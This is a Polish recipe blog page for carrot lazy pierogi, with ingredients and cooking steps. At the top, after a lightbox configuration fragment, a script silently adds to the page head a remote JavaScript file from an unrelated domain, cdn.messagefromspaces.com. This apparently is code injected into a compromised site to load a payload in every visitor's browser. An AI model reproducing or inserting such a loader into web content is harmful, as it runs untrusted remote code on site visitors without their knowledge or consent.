, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Marchewkowe pierogi leniwe

Wydrukuj artykuł Wydrukuj artykuł

Marchewkowe leniwe pierogi

Ten przepis jest stworzony „w biegu”. Klasyczne leniwe pierogi zawierałyby 2 jajka: oddzielnie żółtka i białka ubite na pianę. Jednak nie było czasu na „bicie piany”, więc poszło jedno jajko (bo tylko jedno w lodówce zostało)  i to w całości. Dołożyłam za to trochę mąki ziemniaczanej by poprawić lepkość konsystencji i wyszły jak należy.

  • 2/3 szklanki twarogu
  • 2/3 szklanki drobno startej marchewki (wcześniej ugotowanej w łupinach)
  • 2/3 szklanki mąki pszennej
  • czubata łyżka mąki ziemniaczanej
  • całe jajko

Twaróg rozgnieść widelcem. Dodać marchewkę (ja miałam jeszcze troszkę ugotowanych mini patisonów, je też wrzuciłam do ciasta :)) jajko i mąkę. Masa będzie się lepić, ale lepiej nie dosypywać zbyt dużo mąki – pierogi mogą być wtedy zbyt twarde. Ciasto wyłożyć na stolnicę wysypaną mąką, uformować wałeczek, lekko spłaszczyć. Ostrym nożem odkrajać kawałki, wrzucać na wrzątek, gotować chwilę do wypłynięcia. Wyłowić i podawać na słodko – jak klasyczne pierogi leniwe, tj. z roztopionym masłem, bułką tartą i cukrem lub na słono – jak kopytka tj. zalać obiadowym sosem.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony